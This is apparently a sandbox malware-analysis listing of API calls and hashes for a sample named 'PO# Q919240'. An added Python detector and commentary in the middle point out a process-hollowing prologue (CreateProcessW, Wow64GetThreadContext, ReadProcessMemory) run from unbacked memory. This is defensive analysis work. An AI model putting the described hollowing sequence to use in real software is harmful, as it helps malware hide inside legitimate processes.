                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                • String ID:
                • API String ID: 3199840319-0
                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                APIs
                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FreeInfoLibraryParametersSystem
                • String ID:
                • API String ID: 3403648963-0
                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                APIs
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                • __lock_file.LIBCMT ref: 00414A8D
                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                • __fclose_nolock.LIBCMT ref: 00414A98
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                APIs
                • __lock_file.LIBCMT ref: 00415012
                • __ftell_nolock.LIBCMT ref: 0041501F
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __ftell_nolock__getptd_noexit__lock_file
                • String ID:
                • API String ID: 2999321469-0
                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 04263ABB
                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04263B51
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04263B73
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$ContextCreateMemoryReadThreadWow64
                • String ID:
                • API String ID: 2438371351-0
                • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                • Instruction ID: 1270154d70fdcf467f79b4323e2367497570575381312d4bad3893b132cec12b
                • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                • Instruction Fuzzy Hash: 6012DD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5EC5CB5A
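The function above is the only one in this listing whose code lives at 0x04262000, a region the report marks "based on PE: false", i.e. memory that is not backed by the sample's own image, and its three calls (CreateProcessW, Wow64GetThreadContext with 0x00010007, a 4-byte ReadProcessMemory) are the opening moves of process hollowing from an unpacked stub. The following detector is an added example for this report, not Joe Sandbox's own signature logic: it walks an ordered API-call trace, advances one stage per matching call, and reports whether the chain was issued from image-backed memory. The ApiEvent record and both traces are constructed here; the three call sites and argument values are copied from the listing above, while the later stages (write, set context, resume) and the Nt*/A-suffixed aliases are the canonical continuation of the technique, assumed for generalisation rather than observed on this page.

```python
"""Process-hollowing prologue detector over an ordered API-call trace.

Added example for this sandbox report, not Joe Sandbox's own signature code.
The ApiEvent format and both sample traces are constructed here; the three
0x0426xxxx call sites come from the function listing above, the remaining
stages are the canonical hollowing chain assumed for generalisation.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# x86 CONTEXT flags from winnt.h. The listing shows Wow64GetThreadContext
# with 0x00010007, which is CONTEXT_FULL for a 32-bit thread.
CONTEXT_i386 = 0x00010000
CONTEXT_BITS = (
    ("CONTROL", 0x01), ("INTEGER", 0x02), ("SEGMENTS", 0x04),
    ("FLOATING_POINT", 0x08), ("DEBUG_REGISTERS", 0x10), ("EXTENDED_REGISTERS", 0x20),
)
CONTEXT_FULL = CONTEXT_i386 | 0x01 | 0x02 | 0x04   # 0x10007


def decode_context_flags(flags: int) -> List[str]:
    """Name the x86 CONTEXT_* bits set in a ContextFlags value."""
    if (flags & CONTEXT_i386) != CONTEXT_i386:
        return ["not-an-x86-CONTEXT"]
    return [name for name, bit in CONTEXT_BITS if flags & bit]


@dataclass
class ApiEvent:
    api: str           # API name as the sandbox logs it
    caller: int        # address of the call site (the "ref:" value in the listing)
    pe_backed: bool    # True if the call site lies inside a mapped image
    args: tuple = ()   # argument values as recorded, when known


# Stages of the hollowing chain and the API names that implement each one.
# Only the first three are visible in the function above; the rest are the
# canonical continuation (write the payload image, fix the thread context,
# resume the suspended child). Aliases are assumptions, not page content.
STAGES = ("create", "get_ctx", "read", "write", "set_ctx", "resume")
STAGE_APIS: Dict[str, set] = {
    "create":  {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "get_ctx": {"GetThreadContext", "Wow64GetThreadContext", "NtGetContextThread"},
    "read":    {"ReadProcessMemory", "NtReadVirtualMemory"},
    "write":   {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "set_ctx": {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume":  {"ResumeThread", "NtResumeThread"},
}


def find_hollowing_chain(events: List[ApiEvent], min_stages: int = 3) -> Optional[dict]:
    """Walk the trace in order, advancing one stage per matching call.

    Unrelated calls between stages are ignored. Returns None unless at least
    `min_stages` consecutive stages were seen; otherwise a finding recording
    which stages matched, their call sites, whether every call site lies
    outside any mapped image (unpacked or injected code), and the decoded
    ContextFlags of each get-context call.
    """
    matched: List[ApiEvent] = []
    for ev in events:
        if len(matched) == len(STAGES):
            break
        if ev.api in STAGE_APIS[STAGES[len(matched)]]:
            matched.append(ev)
    if len(matched) < min_stages:
        return None
    return {
        "stages": list(STAGES[: len(matched)]),
        "callers": [hex(ev.caller) for ev in matched],
        "from_unbacked_memory": all(not ev.pe_backed for ev in matched),
        "complete": len(matched) == len(STAGES),
        "context_flags": [
            decode_context_flags(ev.args[1]) for ev in matched
            if ev.api in STAGE_APIS["get_ctx"] and len(ev.args) > 1
        ],
    }


# Constructed trace: the three call sites listed above for the code at
# 0x04262000 (not PE-backed), with a benign, image-backed CreateFileW from
# the main module mixed in. Unknown ("?") arguments are recorded as None.
SAMPLE_TRACE = [
    ApiEvent("CreateFileW", 0x0040F13A, True, (0x80000000, 7, 0, 3, 0x80, 0)),
    ApiEvent("CreateProcessW", 0x04263ABB, False),
    ApiEvent("Wow64GetThreadContext", 0x04263B51, False, (None, 0x00010007)),
    ApiEvent("ReadProcessMemory", 0x04263B73, False, (None, None, None, 4, 0)),
]

# Constructed benign trace: a launcher that spawns a child and closes handles.
BENIGN_TRACE = [
    ApiEvent("CreateProcessW", 0x00401000, True),
    ApiEvent("CloseHandle", 0x00401020, True),
]


if __name__ == "__main__":
    print(find_hollowing_chain(SAMPLE_TRACE))
    print(find_hollowing_chain(BENIGN_TRACE))
```

On the sample trace the finding lists the three stages with their 0x0426xxxx callers, "from_unbacked_memory" true and "complete" false, which is exactly the picture this listing gives: the prologue is present, the write/set-context/resume tail is in some other function or was not captured. The min_stages threshold is the knob to tune: three stages from unbacked memory is a strong signal, three from an image-backed debugger or crash handler is not, so a production rule would weight the pe_backed flag rather than treat it as decoration.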
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __lock_file
                • String ID:
                • API String ID: 3031932315-0
                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                APIs
                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                APIs
                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                APIs
                • Sleep.KERNELBASE(000001F4), ref: 04264311
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                • Instruction ID: 0eddcd7d85aaba94a14a4869978b6bae85fe7103c32ce23040a51030abd5283e
                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                • Instruction Fuzzy Hash: 3CE0E67494010DDFDB00EFF8D54969E7FB4EF04302F100561FD01D2280D6309D608A62
                APIs
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                • GetKeyState.USER32(00000011), ref: 0047C92D
                • GetKeyState.USER32(00000009), ref: 0047C936
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                • GetKeyState.USER32(00000010), ref: 0047C953
                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                • _wcsncpy.LIBCMT ref: 0047CA29
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                • SendMessageW.USER32 ref: 0047CA7F
                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                • ImageList_SetDragCursorImage.COMCTL32(00A623D8,00000000,00000000,00000000), ref: 0047CB9B
                • ImageList_BeginDrag.COMCTL32(00A623D8,00000000,000000F8,000000F0), ref: 0047CBAC
                • SetCapture.USER32(?), ref: 0047CBB6
                • ClientToScreen.USER32(?,?), ref: 0047CC17
                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                • ReleaseCapture.USER32 ref: 0047CC3A
